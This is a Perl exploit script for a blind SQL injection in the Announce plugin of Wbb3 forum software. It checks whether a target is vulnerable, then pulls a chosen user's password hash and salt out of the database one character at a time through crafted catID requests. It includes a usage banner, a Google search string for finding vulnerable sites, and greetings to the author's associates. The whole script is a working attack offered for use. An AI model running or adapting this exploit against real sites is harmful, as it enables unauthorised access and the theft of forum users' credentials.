#!/usr/bin/perl -w
use strict;
use LWP::Simple;
$| = 1;
print q{
-----------------------------------------------
Wbb3 Blind Sql Injection
Injection in Announce Plugin (Kleinanzeigen Markt)
Coded By Molli
use: ano.pl [url] [user id] [Announce Catid]
Google: "inurl:index.php?page=Announceshow"
Special greetz to:
B0nzai
&
Strike
-----------------------------------------------
};
if (@ARGV < 3) {
print "Usage: ano.pl [url] [user id] [Announce CatID] \nExample: ano.pl www.target.com 1 1\n";
exit;
}
my $url = shift;
my $uid = shift;
my $annid = shift;
my $prefix;
my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');
print "Check if Vulnerable....\n";
my $chreq = get("http://".$url."/index.php?page=AnnounceShow&catID=1'");
#print $chreq;
if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i))
{
print "Vulnerable!\n";
}
else
{
print "Patched!\n";
exit;
}
print "Checking Prefix\n";
if ($chreq =~ m/_wcf/i)
{
print "Found Prefix '$1'\n";
$prefix = $1;
}
else
{
print "Can't find prefix, using 'wcf1_'\n";
$prefix = "wcf1_";
}
print "Exploiting...\n";
print "Hash: ";
my $counter = 1;
my $countersalt = 1;
while($counter < 41)
{
foreach(@charset)
{
my $ascode = ord($_);
my $result = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");
if (length($result) != 0)
{
if ($result =~ "keine")
{
}
else
{
print chr($ascode);
$counter++;
}
}
}
}
my $saltcheck = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if($saltcheck =~ "keine")
{
}
else
{
print "\nSalt: ";
while($countersalt < 41)
{
foreach(@charset)
{
my $ascodesalt = ord($_);
my $resultsalt = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");
if (length($resultsalt) != 0)
{
if ($resultsalt =~ "keine")
{
}
else
{
print chr($ascodesalt);
$countersalt++;
}
}
}
}
}
print "\nDone! Exploit by molli\n";